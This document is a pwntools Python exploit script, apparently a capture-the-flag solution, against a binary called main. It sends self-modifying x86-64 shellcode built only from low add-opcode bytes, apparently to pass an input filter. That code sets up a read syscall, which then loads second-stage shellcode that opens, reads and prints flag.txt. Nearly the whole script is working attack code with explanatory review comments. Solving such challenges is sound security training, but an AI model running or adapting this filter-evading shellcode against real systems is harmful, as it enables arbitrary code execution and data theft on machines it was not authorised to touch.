#!/usr/bin/env python3
from pwn import *
# Target binary.  Setting context.binary lets asm()/shellcraft below pick up the
# target's architecture settings from the ELF instead of needing them spelled out.
context.binary = exe = ELF('./bin/main')

# Remote endpoint, overridable from the command line as HOST=... PORT=...
# NOTE(review): a PORT given on the command line arrives as a string, not an
# int; remote() is expected to coerce it — confirm if the connection fails.
host, port = (args.HOST or 'localhost'), (args.PORT or 31034)
def local():
    """Spawn ./bin/main as a child process for local testing.

    The process is started from ./bin so that the stage-2 shellcode's
    open('flag.txt') resolves next to the binary, and is given one argv
    entry, '500'.  NOTE(review): '500' presumably is the payload size limit
    the program later announces — confirm against the binary before changing.
    """
    argv = [exe.path, '500']
    return process(argv, cwd='./bin')
def conn():
    """Return the tube to attack.

    With LOCAL set on the command line this is a freshly spawned local
    process; otherwise a TCP connection to host:port.
    """
    if not args.LOCAL:
        return remote(host, port)
    return local()
def debug():
    """Attach gdb with `gdbscript` and pause until the user continues.

    Only does anything when LOCAL is set; attaching to a remote tube makes no
    sense.  Relies on the module-level tube `r` and on `gdbscript`, both of
    which are bound further down the file, so it must be called after
    `r = conn()`.
    """
    if not args.LOCAL:
        return
    gdb.attach(r, gdbscript=gdbscript)
    pause()
# gdb commands fed to debug(): load the target's symbols, set a PIE-relative
# breakpoint at offset 0x16a1 (`pie br` is a gdb-plugin command, not stock
# gdb), then continue.  NOTE(review): 0x16a1 presumably is where stage-1 input
# starts executing — confirm in the binary.  The leading/trailing '' entries
# keep the exact "\n...\n" framing of the original literal.
gdbscript = '\n'.join([
    '',
    f'file {exe.path}',
    'pie br *0x16a1',
    'c',
    '',
])
r = conn()

# The service announces the maximum stage-1 size in its banner; parse it.
# Bytes delimiters avoid pwntools' str->bytes coercion warning.  int() accepts
# bytes and strips the trailing delimiter, and raises ValueError on an
# unexpected banner — the right failure for a one-shot solver.
r.recvuntil(b'the current limit is ')
raw_limit = r.recvuntil(b' ')
limit = int(raw_limit)
log.info(f'limit: {limit}')
# Stage 1: a self-modifying x86-64 payload.  Every `.byte` and every immediate
# below lies in 0x00-0x05, which are exactly the x86 `add` opcodes, so the
# whole buffer apparently has to pass an "add-only / small bytes" filter
# (presumably the challenge's restriction — confirm against the binary).
# Each `add ... [rip]` patches the bytes that immediately follow it, turning
# the 0x00/0x05 filler into the instructions named in the inline comments.
# Per those comments the end state is
#   lea rsi, [rip]; mov edx, 0x500; mov edi, 0; xor eax, eax; syscall
# i.e., if so, read(0, <just after the lea>, 0x500), which pulls stage 2 in
# over the tail of this buffer.
# NOTE(review): the arithmetic assumes eax holds 0x13371337 when the payload
# starts (the `// 13371337` comment); that is a property of the target, not
# of this script — confirm before retargeting.  The listing is byte-exact;
# do not reflow or "tidy" it.
cod = asm('''
// 13371337
add dword ptr [rip+1], eax
// double eax + 0x05050505
.byte 5
.byte 5
.byte 5
.byte 5
.byte 5
// 2b732b73 -> 3088438b
add eax, 0x05050505
add eax, 0x00050505
add eax, 0x00050505
add eax, 0x00050505
add eax, 0x00010404
add dword ptr [rip], eax
// creates nop; lea rsi, [rip]
.byte 5
.byte 5
.byte 5
.byte 5
.byte 0
.byte 0
.byte 0
.byte 0
// 3088438b
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 2
add byte ptr [rip], al
// creates mov edx, 0x500
.byte 0
.byte 0
.byte 5
.byte 0
.byte 0
add byte ptr [rip], al
// creates mov edi, 0
.byte 5
.byte 0
.byte 0
.byte 0
.byte 0
// 308843ba
add dword ptr [rip+1], eax
// double eax
.byte 5
.byte 5
.byte 5
.byte 5
.byte 5
// 66158c79
add eax, 0x05050505
add eax, 0x05050505
add eax, 0x05050205
add eax, 0x05050005
add eax, 0x05050005
add eax, 0x05050005
add eax, 0x01050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00040005
add al, 2
// 855f98c6
add dword ptr [rip+1], eax
// double eax
.byte 5
.byte 0
.byte 0
.byte 0
.byte 0
// 0abf318c
add dword ptr [rip], eax
// creates nop; xor eax, eax; syscall
.byte 4
.byte 0
.byte 1
.byte 5
.byte 5
''')
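debug()

# Stage 1 must fit the limit the service announced.  bytes.ljust() pads but
# never truncates, so an oversized payload would be sent anyway and the
# service would consume only a prefix of it (or reject it) — the exploit
# would then fail somewhere confusing.  Fail loudly here instead.
stage1_len = len(cod)
print(stage1_len)  # 202 at the time of writing
if stage1_len > limit:
    # log.error aborts the script (pwntools raises on error()).
    log.error(f'stage 1 is {stage1_len} bytes but the service limit is {limit}')
# Pad with '\n' to exactly `limit` bytes so the service's read is satisfied
# in one shot.  NOTE(review): 0x0a is outside the 0x00-0x05 byte range stage 1
# otherwise uses, so presumably the padding is never executed/filtered — confirm.
r.send(cod.ljust(limit, b'\n'))

# Stage 2, delivered through the read() that stage 1 set up.  First move the
# stack to a fixed address so the shellcode has a scratch buffer, then
# open("flag.txt"), read(fd, rsp, 100), write(1, rsp, 100).
# NOTE(review): 0x420691337800 is an assumption about the target's memory map;
# if that page is not mapped and writable, shellcraft.open's pushes will fault.
sc = (
    'mov rsp, 0x420691337800\n'
    + shellcraft.open('flag.txt')
    + shellcraft.read('rax', 'rsp', 100)
    + shellcraft.write(1, 'rsp', 100)
)
# 0x98 (152) bytes of filler precede the shellcode.  This appears to be the
# distance from the read() destination (just after stage 1's `lea rsi, [rip]`,
# roughly 50 bytes in) to the end of the 202-byte stage 1, so the shellcode
# lands exactly where execution resumes after the syscall — confirm against
# the stage-1 layout before changing either side.
stage2 = b'A' * 0x98 + asm(sc)
r.send(stage2)
print(r.recvall())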